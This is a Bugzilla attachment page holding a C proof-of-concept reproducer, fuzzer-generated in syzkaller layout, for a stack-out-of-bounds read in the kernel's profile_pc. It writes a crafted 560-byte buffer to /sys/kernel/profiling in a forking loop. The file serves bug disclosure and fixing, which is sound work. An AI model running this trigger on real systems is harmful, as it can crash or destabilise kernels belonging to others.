Bugzilla – Attachment 719 Details for
Bug 4845
There is a stack-out-of-bounds read in profile_pc
PoC file that can trigger the vulnerability
poc.c (text/x-csrc), 4.77 KB, created by
DuckRui
on 2023-04-27 15:52:34 UTC
Description:
PoC file that can trigger the vulnerability
Filename:
MIME Type:
Creator:
DuckRui
Created:
2023-04-27 15:52:34 UTC
Size:
4.77 KB
// autogenerated by AntFuzz
//
// Reproducer harness for Bug 4845 ("stack-out-of-bounds read in
// profile_pc"). The shape is the usual syzkaller reproducer layout:
// main() maps a fixed RWX scratch region, loop() forks one child per
// iteration, the child runs execute_one() -- which opens
// /sys/kernel/profiling and writes a 0x230-byte buffer to it -- and the
// parent reaps the child or kills it after a 5 s timeout. Only the payload
// bytes in execute_one() are specific to this report.
//
// NOTE(review): writing the sysfs profiling attribute normally requires
// root; confirm the attribute's mode on the target kernel before assuming
// an unprivileged trigger.

#define _GNU_SOURCE

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

// Sleep for ms milliseconds (thin usleep wrapper).
static void sleep_ms(uint64_t ms)
{
  usleep(ms * 1000);
}

// CLOCK_MONOTONIC time in milliseconds. Exits the process if the clock
// cannot be read; there is no caller-visible error path.
static uint64_t current_time_ms(void)
{
  struct timespec ts;
  if (clock_gettime(CLOCK_MONOTONIC, &ts))
    exit(1);
  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

// printf-style write into an existing file. The file is opened O_WRONLY
// without O_CREAT, so a missing path fails. The formatted text is capped at
// 1023 bytes. Returns false if the open fails or the write is short; the
// write's errno is preserved across the close() so the caller can read it.
static bool write_file(const char* file, const char* what, ...)
{
  char buf[1024];
  va_list args;
  va_start(args, what);
  vsnprintf(buf, sizeof(buf), what, args);
  va_end(args);
  buf[sizeof(buf) - 1] = 0;  // vsnprintf already terminates; defensive
  int len = strlen(buf);
  int fd = open(file, O_WRONLY | O_CLOEXEC);
  if (fd == -1)
    return false;
  if (write(fd, buf, len) != len) {
    int err = errno;
    close(fd);
    errno = err;
    return false;
  }
  close(fd);
  return true;
}

// Kill the test child (and its process group, see setpgrp() in setup_test)
// and reap it into *status. After a SIGKILL it first polls waitpid for up
// to ~100 ms; if the child still has not exited it writes to every
// /sys/fs/fuse/connections/<id>/abort entry -- presumably to release tasks
// blocked on FUSE requests, which would otherwise be unkillable -- and then
// blocks until the child is reaped.
static void kill_and_wait(int pid, int* status)
{
  kill(-pid, SIGKILL);
  kill(pid, SIGKILL);
  for (int i = 0; i < 100; i++) {
    // waitpid(-1) reaps any child; only pid is expected to be alive here.
    if (waitpid(-1, status, WNOHANG | __WALL) == pid)
      return;
    usleep(1000);
  }
  DIR* dir = opendir("/sys/fs/fuse/connections");
  if (dir) {
    for (;;) {
      struct dirent* ent = readdir(dir);
      if (!ent)
        break;
      if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
        continue;
      char abort[300];
      snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name);
      int fd = open(abort, O_WRONLY);
      if (fd == -1) {
        continue;
      }
      // Writes one byte (the first byte of the path string); the value
      // written is not meaningful, only that a write happens. Failure is
      // deliberately ignored -- this is best effort.
      if (write(fd, abort, 1) < 0) {
      }
      close(fd);
    }
    closedir(dir);
  } else {
  }
  // Blocking wait; loops past any other reaped child until pid is seen.
  while (waitpid(-1, status, __WALL) != pid) {
  }
}

// Per-child setup, run in the forked test process before execute_one():
// die with the parent, become a process-group leader (so kill_and_wait can
// kill the whole group), and make this process the OOM killer's first pick.
static void setup_test()
{
  prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
  setpgrp();
  write_file("/proc/self/oom_score_adj", "1000");
}

static void execute_one(void);

#define WAIT_FLAGS __WALL

// Main driver; never returns. Each iteration forks a child that runs the
// test body once and exits. The parent polls for the child every 1 ms and,
// if it is still running after 5000 ms, kills and reaps it via
// kill_and_wait(). `iter` is only a counter here.
static void loop(void)
{
  int iter = 0;
  for (;; iter++) {
    int pid = fork();
    if (pid < 0)
      exit(1);
    if (pid == 0) {
      setup_test();
      execute_one();
      exit(0);
    }
    int status = 0;
    uint64_t start = current_time_ms();
    for (;;) {
      if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
        break;
      sleep_ms(1);
      if (current_time_ms() - start < 5000)
        continue;
      kill_and_wait(pid, &status);
      break;
    }
  }
}

// Syscall result slot: r[0] holds the fd returned by openat, or -1 if the
// open failed (the initial value).
uint64_t r[1] = {0xffffffffffffffff};

// The single test case. All fixed addresses below fall inside the anonymous
// RWX mapping at 0x20000000 created in main(), so bytes not written here
// read as zero.
void execute_one(void)
{
  intptr_t res = 0;
  // Path for openat. 21 bytes are copied with no explicit terminator; the
  // NUL is supplied by the zero-filled mapping.
  memcpy((void*)0x20000000, "/sys/kernel/profiling", 21);
  // openat(AT_FDCWD, "/sys/kernel/profiling", 0x40201, 0). 0xff..9c is
  // AT_FDCWD (-100) as an unsigned long. 0x40201 looks like
  // O_WRONLY|O_TRUNC|O_NOATIME on x86 -- confirm against the target ABI.
  res = syscall(__NR_openat, 0xffffffffffffff9cul, 0x20000000ul, 0x40201ul, 0ul);
  if (res != -1)
    r[0] = res;
  // Build the 0x230 (560) byte write buffer at 0x20000300. Field layout as
  // written:
  //   +0x00 u32 0x230   +0x04 u8 0x37   +0x05 u16 0   +0x07 u8 0
  //   +0x08 u64 0       +0x10 u64 0     +0x18 u32 -1  +0x1c u16 0x212
  //   +0x1e 530 bytes of fuzzer-generated data (0x1e + 530 == 0x230)
  // How the kernel parses these bytes is not visible from this file; the
  // bug title says the resulting write reaches the out-of-bounds read in
  // profile_pc.
  *(uint32_t*)0x20000300 = 0x230;
  *(uint8_t*)0x20000304 = 0x37;
  *(uint16_t*)0x20000305 = 0;
  *(uint8_t*)0x20000307 = 0;
  *(uint64_t*)0x20000308 = 0;
  *(uint64_t*)0x20000310 = 0;
  *(uint32_t*)0x20000318 = -1;
  *(uint16_t*)0x2000031c = 0x212;
  memcpy((void*)0x2000031e, "\235\325\337\'\272\'/!\201]#\321\312\245\267\230\377\2128\210\257\267\220\206z\375\361\204\314\342\025\377C2y\347\227-\235\217\275\251N\330\352\364;\266\366\216\344\302\212\364\307\026N!\026\017j\322\177\301\b\246\250\211\343\346-\aq\246\033\',\325\216\277\2512\272\232\030\342\204\311\257\273pI\202o$\372\016\024\217\270A\242\306\243\324\035\262\030\032?\203\006\243\243\202\033\377\235\315\217\256\331\000\242d\341\034\365\b\210<\341\b\037\311\256\346\325k\266*/\031\202\266\361\315\343&\356K\017Yt\272l\016\370\204 \212\240\031\201?\321\3411\334(\361%\246r\030\211\326b\242\206:\265`\247\001m9\334h\026R\257~\256\266l\212[8\366\316mx\230\236\032\346\005\216\004\220\252\264\212;\312\232\252T\357f<{\307\3204\261\215\362\215\302\310c\376\r\354\023)\026\374\023\n\030\202\272G\b\266i\367;\227\322gP\255\354\233l[`\265\177\332J\360\245\362\205E\036\223\245/uvrg\276JHT\347\017\204\365#\376\213(ax)\037\222\207\355\361\364\ah\257\347\356>\0054\'\316\212\377Ir\330=\021l\202<\317\221%I*\313$V\032\314\356\002\213\321\3608\036\032\\vf\345\325\275\337\2250\363)nvI\331S8jXB\272\327\035Vp_\372\306-\003\343\336\231\265\032\236\340\356L\221\377b\'\310\353\351\002\037.\r{\247\305m\321{\276\2007S\003\200V\271\322\253\205\023\262\353\344\r*\034\032\322U\201.6S\241z/0\361\272T0\033h\275GW^\005\252\3022\207Z\335\366f+\274\001N7\361V\363\357\225\367\226\250\202/\233(\203\320cu\276\265W\243x\234K\215A\323\241\327\253\252LW\254\377\021\356&\242\326\006Y\215\t\206\322\312\265\374E\004\031\332\353\240\256`\205l\f\002\351\262\277\2419\206*\374\231\243\367\350\230\027\246\230\326\370\212\005\215q\rV", 530);
  // write(fd, buf, 0x230). If the openat above failed, r[0] is still -1 and
  // this write simply fails with EBADF.
  syscall(__NR_write, r[0], 0x20000300ul, 0x230ul);

}
int main(void)
{
  // Fixed-address scratch memory in the usual syzkaller layout: a PROT_NONE
  // page just below, 16 MiB of PROT_READ|PROT_WRITE|PROT_EXEC (prot 7) at
  // 0x20000000, and a PROT_NONE page just above. Flags 0x32 are
  // MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS; results are not checked.
  syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
  syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
  syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
  loop();  // does not return
  return 0;
}